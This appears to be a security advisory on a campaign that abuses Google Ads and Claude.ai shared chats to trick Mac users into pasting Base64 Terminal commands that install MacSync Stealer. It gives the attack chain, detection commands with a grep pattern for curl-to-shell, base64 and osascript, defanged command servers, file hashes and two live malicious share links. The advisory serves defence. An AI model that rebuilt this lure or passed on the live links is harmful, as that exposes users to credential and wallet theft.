MacSync Stealer: Hackers Abuse Google Ads and Claude.ai Chats to Push Mac Malware

Russian-speaking threat actors are running an active malvertising campaign that weaponises Google Ads and Anthropic's Claude.ai shared-chat feature to deliver MacSync Stealer — an information-stealing malware targeting macOS users — through a social-engineering technique known as ClickFix. Searchers who look up "Claude mac download" are served sponsored results that display the legitimate claude.ai domain but redirect to attacker-controlled pages embedding malicious installation instructions inside fabricated AI conversations. More than 200 malicious ads are in circulation; at least 15,600 users viewed the rogue Claude artifacts before discovery.

MacSync Stealer and ClickFix: Technical Details

MacSync Stealer is a member of the Atomic macOS Stealer (AMOS) family, a prolific ecosystem of macOS infostealers-as-a-service that has evolved continuously since at least April 2023. AMOS variants — including Banshee, Poseidon, RodrigoStealer, and now MacSync — share code lineage and are rented to criminal operators on underground Telegram channels for approximately $1,000 per month. The MacSync variant is operated by a threat actor using the alias mentalpositive on Russian-language forums.

The delivery mechanism is ClickFix (also written Clickfix), a social-engineering technique in which an attacker embeds a Base64-encoded shell command inside a web page and instructs the victim to open Terminal and paste it manually. The phrase "ClickFix" refers to the lure narrative — typically a fake error message or setup guide claiming the user must "fix" a problem by running the provided command. By moving execution into the user's own Terminal session, the attack bypasses browser-level sandbox controls and many endpoint-detection heuristics that look for processes spawned by browser renderers.

The attack chain unfolds in five steps:

• Google Ad. The attacker purchases sponsored search placements targeting queries like Claude mac download. The ad displays claude.ai as the visible destination URL, passing Google's domain-match check, but the landing page is attacker-controlled.
• Fake Claude.ai shared chat. The page redirects to — or embeds — a Claude.ai shared-conversation URL (claude.ai/share/...) crafted to resemble an Apple Support installation guide. Two confirmed malicious share URLs are claude.ai/share/9aac1046-a39e-4618-8265-f54c4be863f7 and claude.ai/share/eb2db455-1d47-4baf-8671-0a689e165902. Anthropic's platform allows any user to publish a conversation as a publicly viewable link — a legitimate collaboration feature that the attackers exploit as a free, trusted-domain hosting vector.
• ClickFix prompt. The chat instructs the victim to open macOS Terminal and paste a Base64-encoded command presented as a required installation step.
• In-memory payload execution. Decoding the Base64 string yields a shell script that downloads and executes the MacSync Stealer payload via osascript (AppleScript, Apple's built-in scripting engine). The payload runs entirely in memory with minimal disk artifacts, reducing the window for antivirus detection.
• Data exfiltration. Collected data is shipped to one of several command-and-control (C2) domains over HTTPS POST requests.

Security engineer Berk Albayrak at Trendyol Group is credited with initial discovery of the Claude variant. Earlier iterations of the same campaign used ChatGPT and Grok artifacts; the pivot to Claude.ai occurred in February 2026.

What MacSync Stealer Collects

Once active, MacSync Stealer harvests a broad range of sensitive data from the infected Mac:

• Browser credentials and cookies from Chrome, Safari, Firefox, Brave, and Chromium-based browsers
• macOS Keychain contents — the system-wide password vault storing Wi-Fi keys, app passwords, and private certificates
• Cryptocurrency wallets — wallet.dat files and seed phrases from common software wallets
• Telegram session files, enabling account takeover without the victim's password
• macOS Notes — the built-in notes application, which users frequently use to store sensitive information
• Documents matching common file extensions from the Desktop and Downloads folders

All collection is performed in-memory where possible, with only transient ZIP archives written to /tmp before transmission.

Exploitation Status and Threat Landscape

The campaign is actively running as of May 10, 2026. Key threat-landscape indicators:

• 200+ malicious Google Ads were confirmed active, spoofing brands including 7-Zip, LibreOffice, Notepad++, Final Cut Pro, Homebrew, and Anthropic's Claude — all common software titles that Mac users actively search for.
• 35+ hijacked Google Ads accounts are being used to distribute the ads, making takedown difficult because the accounts belong to legitimate advertisers.
• 15,600+ views of the rogue Claude.ai shared artifacts were recorded before reporting.
• MacSync Stealer is sold as Malware-as-a-Service (MaaS) on Telegram, meaning multiple operators can run simultaneous campaigns using the same payload.
• The campaign has been flagged by Sophos, SentinelOne, Huntress, Microsoft Security, and CloudSEK.
• The U.S. Center for Internet Security (CIS) issued a dedicated advisory noting MacSync campaigns are impacting U.S. State, Local, Tribal, and Territorial (SLTT) government macOS users.

No CVE identifier has been issued for this campaign because it relies entirely on social engineering rather than a software vulnerability.

Who Is Affected

Any macOS user — regardless of version — who searches for popular software on Google and interacts with a sponsored search result is at risk. The campaign specifically targets:

• Individual Mac users searching for Claude, 7-Zip, LibreOffice, Homebrew, or Final Cut Pro
• Developers and engineers who commonly use Homebrew and command-line tooling — and are therefore more likely to trust and execute a Terminal command from a plausible-looking guide
• U.S. government and public-sector organisations running macOS endpoints
• Cryptocurrency holders — wallet data is a primary collection target

The malware does not exploit a kernel or application vulnerability; it runs entirely within the user's own privilege context. No macOS version, SIP (System Integrity Protection) status, or patch level provides automatic immunity.

What You Should Do Right Now

• Never paste Terminal commands from a web page or chat. Legitimate software does not require you to open Terminal and manually execute commands during installation. If an "installation guide" asks you to do so, treat it as an attack.
• Verify downloads from official sources only. For Claude, the official download is at claude.ai/download. For any software, navigate directly to the vendor's domain — do not click sponsored Google results.
• Audit recently opened Terminal sessions. If you believe you may have executed a pasted command, review your shell history (cat ~/.zsh_history | tail -100) for unfamiliar Base64 strings or curl | bash patterns.
• Check for suspicious outbound connections. Look for POST traffic to any of the known C2 domains: mansfieldpediatrics[.]com, gatemaden[.]space, focusgroovy[.]com, a2abotnet[.]com, bernasibutuwqu2[.]com. Use lsof -i or your endpoint security console.
• Rotate credentials immediately if you suspect compromise — prioritise browser-stored passwords, macOS Keychain-managed accounts, and any cryptocurrency seed phrases. Enable MFA on all accounts that support it.
• Deploy endpoint detection. Security vendors including Malwarebytes for Mac, SentinelOne, and Sophos have updated signatures for MacSync Stealer. Run a full scan and verify your EDR (Endpoint Detection and Response — software that continuously monitors and records system activity) telemetry for osascript invocations spawned by user shell sessions.

# Check shell history for base64-encoded payloads (zsh)
grep -E 'base64|osascript|curl.*sh|bash.*<\(' ~/.zsh_history | tail -50

# List processes with open network connections
lsof -i -nP | grep ESTABLISHED

Background: Understanding the Risk

This campaign highlights two compounding trust problems that make macOS users particularly vulnerable right now.

Shared AI chat URLs as an attack surface. Platforms like Claude.ai, ChatGPT, and Grok allow users to publish conversations as permanent, publicly accessible URLs. This is a valuable collaboration feature — but it also means an attacker can author any content they want (including convincing fake "Apple Support" guides), publish it at a trusted first-party domain (claude.ai), and link to it from a malicious ad. Browser security indicators — the padlock, the green URL bar — show claude.ai as legitimate because the domain is legitimate. The malicious content lives inside the page, not in the domain.

ClickFix is a growing attack class, not a one-off. The technique was documented extensively in 2025 across Windows campaigns (fake CAPTCHA pages instructing users to press Win+R and paste a PowerShell payload). Attackers are now applying the same template to macOS, replacing PowerShell with Terminal and osascript. Because the command runs in the user's own session — not spawned by a browser subprocess — many EDR rules that monitor for browser-child-process execution do not fire. The shift to in-memory execution via osascript further reduces forensic visibility.

The AMOS ecosystem demonstrates that macOS malware has matured into a professional MaaS industry. Earlier threat models that treated macOS as inherently safer than Windows due to lower market share are increasingly outdated — macOS is disproportionately common among developers, finance professionals, and executives, making its users high-value targets even at lower absolute volume.

Indicators of Compromise

Malicious Claude.ai shared chat URLs:

• https://claude.ai/share/9aac1046-a39e-4618-8265-f54c4be863f7
• https://claude.ai/share/eb2db455-1d47-4baf-8671-0a689e165902

C2 domains (defanged):

• mansfieldpediatrics[.]com
• houstongaragedoorinstallers[.]com
• gatemaden[.]space
• focusgroovy[.]com
• securityfenceandwelding[.]com
• a2abotnet[.]com
• customroofingcontractors[.]com
• bernasibutuwqu2[.]com
• briskinternet[.]com

File hashes (MD5):

• 73600d113646a95d2e459dd940c18e1e — initial shell script
• 74e17b926dc6cc5ab247aa0e059916c1 — Base64 decode script
• 4aab18983ab8c00f3c619b75033ce548 — MacSync Stealer binary

Campaign fingerprint:

• API key 5190ef1733183a0dc63fb623357f56d6 is hardcoded in payload; presence in network traffic or memory confirms this campaign.

Conclusion

MacSync Stealer's Google Ads and Claude.ai campaign is active, technically polished, and specifically engineered to target users who are most likely to follow technical instructions without suspicion. The single most important action for macOS users and IT teams is to enforce a hard rule: no legitimate installation ever requires pasting a command into Terminal. Treat any such instruction — regardless of how professional the surrounding page looks, and regardless of whether it appears on a trusted domain — as a red flag and report it.